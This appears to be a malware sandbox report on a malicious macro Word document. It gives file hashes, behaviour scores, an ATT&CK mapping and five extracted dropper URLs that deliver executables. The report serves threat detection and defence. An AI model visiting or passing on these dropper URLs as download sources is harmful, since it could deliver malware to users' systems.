Overview

overview

10

Static

static

8

28876a11ad...73.doc

windows7-x64

10

28876a11ad...73.doc

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    28876a11ade2b3fd8159f6b24b0508305eaedea70919893103b806784c271473.doc.zip

  • Size

    163KB

  • Sample

    230330-napxmadh3v

  • MD5

    ae45e8894a929683ca1b048c61099728

  • SHA1

    666615fba529b3143a4dcf59f494f5598f37810b

  • SHA256

    f01fa5992e33212148b2b57b7a027066e183edaca8e6c2bb031824766fcafdf5

  • SHA512

    e6cfe8824481286137fce10d0aafc3c2c09e99404d8464cf775f97df199be894f79ba2371b1be4a69d854a11d75d9dfd5899aae95a5f4af93fc1182e8957e36d

  • SSDEEP

    3072:Hn48Kle9DFhVuva/TKpSbNSC7MHeRQPi/rnusHVxuRzqoacZknBHsuaDZV2rxhmC:Hn48aejTuva/TK0bzgHeiPkH/uRzFdZU

Score
10/10
macromacro_on_action

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://www.lbbsport.pl/Izmqs/
exe.dropper

http://www.isaac.samjoemmy.com/H9TF8/
exe.dropper

http://www.electrocad.in/4qTumjs/
exe.dropper

http://www.abilitymep.ae/mXss/
exe.dropper

http://www.efmj-eg.org/CdwOm/

Targets

    • Target

      28876a11ade2b3fd8159f6b24b0508305eaedea70919893103b806784c271473.doc

    • Size

      235KB

    • MD5

      57a933abcd0a70f46006deb5c3d507a0

    • SHA1

      fd6892c482305d7a6edbb2356d8f19330f5ba87b

    • SHA256

      28876a11ade2b3fd8159f6b24b0508305eaedea70919893103b806784c271473

    • SHA512

      b41788f33df1171ddac802e85589cc59ef1b539ab2489e85c4912b5ea85012763afd3f024fe9467617329c2af840341089e64121e9217321258e71e98c337faf

    • SSDEEP

      3072:uH9nBf4SuEjAhmAMOc7kkkko1rkGuF3tBInxGGq52yXJm9YBmjDRErQm:uFVeEsjdXRC3jexGG6NYWofREkm

    Score
    10/10

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    behavioral1behavioral2

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1
T1112

Credential Access

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Tasks